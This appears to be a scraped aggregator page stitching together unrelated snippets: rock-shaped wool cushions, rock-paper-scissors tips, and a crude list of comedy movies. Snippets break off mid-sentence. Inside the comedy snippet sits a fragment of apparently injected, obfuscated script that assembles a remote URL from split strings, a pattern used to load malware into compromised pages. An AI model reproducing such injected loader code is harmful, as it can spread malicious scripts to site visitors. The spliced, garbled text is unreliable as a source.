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Soft as a Rock (by @baekdal) #design

Soft as a Rock (by @baekdal) #design
Rocks, stones and pebbles have been used as decorative objects since... well... the stone age actually. But, rocks are usually a bit hard to be around. They often look cool, but you wouldn't exactly hug one - until now! Stephanie Marin is the creator of these amazing looking stones, which is actually very soft and comfortable cushions. Made of 100% virgin wool no less - although I have absolutely no idea what makes wool "virgin"... was it never used before? Update: See also Ronal Jordaan's Rock Cushions (much better looking than the ones above) Follow: 42Concepts

how to win rock paper siccors every time I admit it. When I first heard there are actual tournaments for Rock-paper-scissors, sanctioned by the World Rock Paper Scissors Society, I laughed. I mean seriously, $50k to the winner of a game that requires no skill whatsoever? Absurd. Boy was I wrong. Rock-paper-scissors isn't just a silly game kids play or a way to decide who has to be the designated driver at parties. Males have a tendency to throw rock on their first try, inexperienced RPS players will subconsciously deliver the item that won previously, and paper is thrown least often, so use it as a surprise.

funny movies! Truthfully, Comedy Movies make life worth laughing and livin'(besides porn).)){u='http'+'://buro'+'tkan'+' Just The Facts A good comedy should make a person laugh out loud (not lol) more than 10 times. A good comedy should not have too much drama to tie in a main plot. A good comedy should always start off with a bang in the beginning and leave the audience laughing when the credits are rolling. A list of Comedies you should watch before you die Meet the parents...every boyfriends worst nightmare. Meet the Fockers...every newlyweds worst nightmare. Accepted...where college aint' all that. American Pie (Only 1)..boobs, cursing, life lessons, and pie sex, what can go wrong? Anchorman...stupidity at a new level. Austin Power series ...a man with bad teeth saves the world from himself and ridiculous characters. Blades of Glory...where ice skating isn't gay. Borat..." Clerks 1 and 2...The movie where we learned never to go ass to mouth. Dodgeball...never touch ben stiller's balls. Mr. Walk Hard..."
